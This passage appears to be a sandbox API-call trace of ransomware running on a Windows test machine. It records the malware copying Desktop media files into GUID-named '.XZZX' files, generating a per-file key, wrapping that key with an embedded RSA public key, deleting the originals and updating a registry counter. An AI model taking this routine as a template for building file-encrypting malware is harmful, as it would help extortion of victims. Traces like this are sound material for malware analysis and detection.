lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.827] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0168.827] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0168.827] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9bc) returned 0x0 [0168.827] RegQueryValueExW (in: hKey=0x9bc, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf8, lpcbData=0x29adfdc*=0x4) returned 0x0 [0168.827] RegCloseKey (hKey=0x9bc) returned 0x0 [0168.827] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9bc) returned 0x0 [0168.827] RegSetValueExW (in: hKey=0x9bc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf9, cbData=0x4 | out: lpData=0x29adfec*=0xf9) returned 0x0 [0168.828] RegCloseKey (hKey=0x9bc) returned 0x0 [0168.828] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.828] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.828] CloseHandle (hObject=0x9b4) returned 1 [0168.828] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0168.828] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0168.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\BOrtQ-gODoJ96Mp2i.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\bortq-godoj96mp2i.pps")) returned 1 [0168.829] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\BOrtQ-gODoJ96Mp2i.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\bortq-godoj96mp2i.pps")) returned 0 Thread: id = 574 os_tid = 0x684 [0168.861] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.861] lstrcpyW (in: lpString1=0x29af460, lpString2="RH-9w1ekDlX.swf" | out: lpString1="RH-9w1ekDlX.swf") returned="RH-9w1ekDlX.swf" [0168.861] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.861] SetErrorMode (uMode=0x1) returned 0x1 [0168.861] lstrcpyW (in: lpString1=0x29af860, lpString2="RH-9w1ekDlX.swf" | out: lpString1="RH-9w1ekDlX.swf") returned="RH-9w1ekDlX.swf" [0168.861] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x78b38bee, Data2=0x8224, Data3=0x45e9, Data4=([0]=0x8a, [1]=0xab, [2]=0x67, [3]=0xc4, [4]=0x8c, [5]=0x7, [6]=0xbd, [7]=0xd1))) returned 0x0 [0168.861] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\RH-9w1ekDlX.swf") returned 77 [0168.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0168.861] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\264E8978238A26C478B38BEE26250B0C.XZZX") returned 99 [0168.861] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="XZZX") returned 0x0 [0168.861] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\RH-9w1ekDlX.swf", dwFileAttributes=0x20) returned 1 [0168.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\RH-9w1ekDlX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rh-9w1ekdlx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b8 [0168.862] ReadFile (in: hFile=0x9b8, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x14126, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x14126, lpOverlapped=0x0) returned 1 [0168.863] CloseHandle (hObject=0x9b8) returned 1 [0168.863] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0168.863] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0168.863] SetErrorMode (uMode=0x1) returned 0x1 [0168.863] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0168.863] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5030) returned 1 [0168.865] CryptGenKey (in: hProv=0x43a5030, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0168.996] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.996] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.996] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.997] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0168.997] CryptDestroyKey (hKey=0x4372978) returned 1 [0168.997] CryptReleaseContext (hProv=0x43a5030, dwFlags=0x0) returned 1 [0168.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\264E8978238A26C478B38BEE26250B0C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\264e8978238a26c478b38bee26250b0c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b8 [0168.997] WriteFile (in: hFile=0x9b8, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x14126, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x14126, lpOverlapped=0x0) returned 1 [0168.999] SetFilePointer (in: hFile=0x9b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14126 [0168.999] WriteFile (in: hFile=0x9b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.999] SetFilePointer (in: hFile=0x9b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1412b [0168.999] WriteFile (in: hFile=0x9b8, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1e, lpOverlapped=0x0) returned 1 [0168.999] SetFilePointer (in: hFile=0x9b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14149 [0168.999] WriteFile (in: hFile=0x9b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.999] SetFilePointer (in: hFile=0x9b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1414e [0168.999] SetErrorMode (uMode=0x1) returned 0x1 [0168.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0168.999] OutputDebugStringW (lpOutputString="end") [0168.999] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.999] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0168.999] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5030) returned 1 [0169.000] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5030, dwCertEncodingType=0x1, pInfo=0x437f8a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f8d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f8e0*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372df8) returned 1 [0169.000] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.001] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.001] CryptEncrypt (in: hKey=0x4372df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.001] CryptEncrypt (in: hKey=0x4372df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a50b8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a50b8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.001] WriteFile (in: hFile=0x9b8, lpBuffer=0x43a50b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a50b8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.001] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.001] WriteFile (in: hFile=0x9b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.001] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.001] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.001] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9c0) returned 0x0 [0169.001] RegQueryValueExW (in: hKey=0x9c0, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf9, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.001] RegCloseKey (hKey=0x9c0) returned 0x0 [0169.001] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9c0) returned 0x0 [0169.001] RegSetValueExW (in: hKey=0x9c0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xfa, cbData=0x4 | out: lpData=0x29adfec*=0xfa) returned 0x0 [0169.002] RegCloseKey (hKey=0x9c0) returned 0x0 [0169.002] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.002] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.002] CloseHandle (hObject=0x9b8) returned 1 [0169.002] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.002] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.002] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\RH-9w1ekDlX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rh-9w1ekdlx.swf")) returned 1 [0169.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\RH-9w1ekDlX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rh-9w1ekdlx.swf")) returned 0 Thread: id = 575 os_tid = 0x34c [0169.017] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.017] lstrcpyW (in: lpString1=0x29af460, lpString2="rvzAqm2.flv" | out: lpString1="rvzAqm2.flv") returned="rvzAqm2.flv" [0169.017] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.017] SetErrorMode (uMode=0x1) returned 0x1 [0169.017] lstrcpyW (in: lpString1=0x29af860, lpString2="rvzAqm2.flv" | out: lpString1="rvzAqm2.flv") returned="rvzAqm2.flv" [0169.017] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x1b579b86, Data2=0x941a, Data3=0x44c5, Data4=([0]=0xb6, [1]=0x4f, [2]=0x2d, [3]=0x63, [4]=0x4b, [5]=0x61, [6]=0x3f, [7]=0xad))) returned 0x0 [0169.017] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\rvzAqm2.flv") returned 73 [0169.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.017] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\6CCF439C27C8E0021B579B862A63C44A.XZZX") returned 99 [0169.017] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="XZZX") returned 0x0 [0169.017] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\rvzAqm2.flv", dwFileAttributes=0x20) returned 1 [0169.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\rvzAqm2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rvzaqm2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9bc [0169.018] ReadFile (in: hFile=0x9bc, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xd764, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xd764, lpOverlapped=0x0) returned 1 [0169.019] CloseHandle (hObject=0x9bc) returned 1 [0169.019] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.020] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.020] SetErrorMode (uMode=0x1) returned 0x1 [0169.020] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.020] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5140) returned 1 [0169.023] CryptGenKey (in: hProv=0x43a5140, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0169.131] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.131] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.131] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.131] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.131] CryptDestroyKey (hKey=0x4372978) returned 1 [0169.131] CryptReleaseContext (hProv=0x43a5140, dwFlags=0x0) returned 1 [0169.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\6CCF439C27C8E0021B579B862A63C44A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\6ccf439c27c8e0021b579b862a63c44a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9bc [0169.136] WriteFile (in: hFile=0x9bc, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xd764, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xd764, lpOverlapped=0x0) returned 1 [0169.137] SetFilePointer (in: hFile=0x9bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd764 [0169.137] WriteFile (in: hFile=0x9bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.138] SetFilePointer (in: hFile=0x9bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd769 [0169.138] WriteFile (in: hFile=0x9bc, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x16, lpOverlapped=0x0) returned 1 [0169.138] SetFilePointer (in: hFile=0x9bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd77f [0169.138] WriteFile (in: hFile=0x9bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.138] SetFilePointer (in: hFile=0x9bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd784 [0169.138] SetErrorMode (uMode=0x1) returned 0x1 [0169.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.138] OutputDebugStringW (lpOutputString="end") [0169.138] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.138] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.138] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5140) returned 1 [0169.139] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5140, dwCertEncodingType=0x1, pInfo=0x437f978*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f9a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f9b0*, PublicKey.cUnusedBits=0x0), 